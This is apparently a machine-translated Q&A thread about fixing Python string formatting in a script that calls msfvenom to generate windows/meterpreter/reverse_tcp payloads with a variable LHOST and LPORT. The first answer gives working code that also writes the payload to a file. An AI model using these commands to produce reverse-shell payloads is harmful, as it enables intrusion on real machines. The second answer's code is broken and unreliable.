在python2.7.12中传递命令行参数时将变量作为字符串追加

call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=%s", "LPORT=%s", "-e %s", "-i %d", "-f %s", "> %s.%s"]) % (str(lhost), str(lport), str(encode), iteration, str(formatop), str(payname), str(formatop))

/usr/bin/msfvenom:168:in `parse_args': invalid argument: -i %d (OptionParser::InvalidArgument) from /usr/bin/msfvenom:283:in `<main>' Traceback (most recent call last): File "menu.py", line 74, in <module> call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=%s", "LPORT=%s", "-e %s", "-i %d", "-f %s", "> %s.%s"]) % (str(lhost), str(lport), str(encode), iteration, str(formatop), str(payname), str(formatop)) TypeError: unsupported operand type(s) for %: 'int' and 'str'

call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST={0}", "LPORT={1}", "-e {2}", "-i {3}", "-f {4}", "> {5}.{6}"]).format(lhost, lport, encode, iteration, formatop, payname, formatop)

2条回答

网友

1楼 · 编辑于 2024-04-20 12:09:53

不能对call(...)的结果使用format。您应该格式化每个组件：

with open("{}.{}".format(payname, format), 'w') as outfile:
    call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST={}".format(lhost), "LPORT={}".format(lport), "-e", str(encode), "-i", str(iteration), "-f", str(format)], stdout=outfile)

请注意，重定向被显式打开的文件替换，因为subprocess.call不会将其传递给shell，除非启用不安全的shell=True参数。你知道吗

用不同的有效负载多次重复这个过程很容易：用有效负载创建一个数组，然后将此代码放入一个循环中（或者更清楚地说，一次用一个有效负载调用一个函数）。你知道吗

网友

2楼 · 编辑于 2024-04-20 12:09:53

一个很好的技巧是在命令中使用split来创建传递给call的列表，这也会使变量替换更干净：

call("msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -e {2} -i {3} -f {4} > {5}.{6}"
     .split().format(lhost,  lport, encode, iteration, formatop, payname, formatop))

相关问题更多 >

编程相关推荐

热门问题

热门文章